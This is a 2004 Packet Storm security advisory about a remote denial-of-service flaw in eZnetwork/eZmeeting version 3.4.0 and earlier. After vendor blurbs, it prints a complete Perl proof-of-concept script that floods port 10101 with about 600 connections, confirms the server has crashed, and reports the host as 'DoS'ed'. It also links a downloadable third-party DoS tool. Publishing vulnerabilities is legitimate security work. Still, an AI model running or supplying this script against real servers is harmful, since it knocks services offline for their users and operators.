ez.txt

2004-09-09T00:00:00
ID PACKETSTORM:34263
Type packetstorm
Reporter Dr. Insane
Modified 2004-09-09T00:00:00

Description

                                        
                                            `  
Security Advisory  
  
  
  
Vulnerability: Eznetwork multiple connections Denial of service  
Packages : "eZ34.exe" and "eZphoto1.2.1.EXE"  
+ eZ  
+ eZphotoshare  
+ eZmeeting  
+ eZnetwork  
+ eZshare  
Software : www.eZmeeting.com  
[version 3.4.0]  
eZnet Modules:  
SwServer: 1.153  
SwEzModule.dll: 1.72  
SwLoginModule.dll: 1.94  
SwMetaObjectModule.dll: 1.46  
SwProxyModule.dll: 1.35  
SwShareModule.dll: 1.90  
SwStatusModule.dll: 1.41  
SwTransferModule.dll: 1.172  
  
Version : 3.4.0 and prior  
Vendor : eZnetwork  
Vendor Url : http://www.ezmeeting.com/Products.html  
Bug Type : Denial of service attack  
Severity : Medium--->remote crash  
Severity : medium  
Author: dr_insane , dr_insane@pathfinder.gr  
  
  
#################################################  
  
#################################################  
  
1. Description  
  
eZ:  
---  
"Imagine going to the movies, but instead of seeing the picture, someone had to  
describe it to you verbally. That's what's happening in countless business  
discussions and conference calls every day. A lot of time and money is being  
wasted. That's why we created eZ. Now imagine having the ability to  
place any document right in front of the person you’re speaking with on the  
phone, immediately - Word, Excel, PowerPoint, PDF, CAD, Digital Photos. Online.  
Real time. That's the power of eZ. Regardless of the distance that separates  
your team, eZ delivers an amazingly interactive, simple, visual workspace for  
all team players. If a picture paints a thousand words, think what an  
interactive picture can do for your business. Picture it with eZ."  
- Vendor's Description  
  
eZnetwork:  
----------  
"eZnetwork is a service that works hand in hand with the eZ desktop application.  
It allows users to connect with others (outside their Local Area Network) over  
the Internet, by using an eZ identity, or 'Friendly Name'. eZnetwork also allows  
users to host conferences and join conferences, even when one or more  
participants are located behind corporate firewalls, without compromising  
security."  
- Vendor's Description  
  
eZphotoshare:  
-------------  
"eZphotoshare is an amazing new way to share Digital Photos over the Internet  
with friends and family. Seeing is believing, download it today and  
interactively share digital photos anytime, anywhere. It's FREE for home use."  
- Vendor's Description  
  
  
2. Vulnerability Details  
The vulnerability is caused due to an error in the connection handling, which can be exploited to crash the   
server by establishing about 600 connections to 10101 port.  
  
By executing the following code against Ez.exe (port 10101) the server will crash:  
  
-----------------------------------------------------------------  
  
"C:\Perl\bin\perl5.6.1.exe "C:\kill_ez.pl" 127.0.0.1 10101 600" |  
  
-----------------------------------------------------------------  
  
#!/usr/bin/perl  
  
use Strict;   
use Socket;  
use IO::Socket;  
  
my $host = $ARGV[0];  
my $port = $ARGV[1];  
my $stop = $ARGV[2];  
my $size = 1000;  
my $prot = getprotobyname('tcp');  
my $slep = $ARGV[3];  
  
printf("================================================\n");  
printf(" Eznetwork POC \n");  
printf("================================================\n");  
printf("[*] Making %d Connections To %s \n", $stop , $host);  
  
for ($i=1; $i<$stop; $i++)  
{  
socket($i, PF_INET, SOCK_STREAM, $prot );   
my $dest = sockaddr_in ($port, inet_aton($host));  
connect($i, $dest);  
}  
  
CheckServer($host, $i, $slep, $stop);  
KillThreads($stop);  
printf("[*] Exploit Attempt Unsuccesful");  
exit;  
  
sub CheckServer($host, $i, $slep, $stop) {  
($host, $i, $slep, $stop) = @_;  
$blank = "\015\012" x 2;  
$request = "GET / HTTP/1.0".$blank;  
$remote = IO::Socket::INET->new( Proto => "tcp",  
PeerAddr => $host,  
PeerPort => $port,  
Timeout => '10000',  
Type => SOCK_STREAM,  
);   
print $remote $request;  
unless ( <$remote> )  
{  
printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);  
printf("[*] The Host Will Be Down For %d Seconds\n", $slep);  
sleep($slep);  
KillThreads($stop);  
exit;  
}  
}  
  
sub KillThreads($stop) {  
$stop = @_;  
printf("[*] Killing All active Connections");  
for ($l=1; $l<$stop; $l++) {  
shutdown($l,2)|| die("Couldn't Shut Down Socket");  
$l++;  
}  
}  
  
  
If you don't want to use this code you can download g0dzilla to test it:   
http://members.lycos.co.uk/r34ct/main/godzillaDosTool/upgrade_to_v02.exe  
  
  
Workaround:  
User another product  
  
`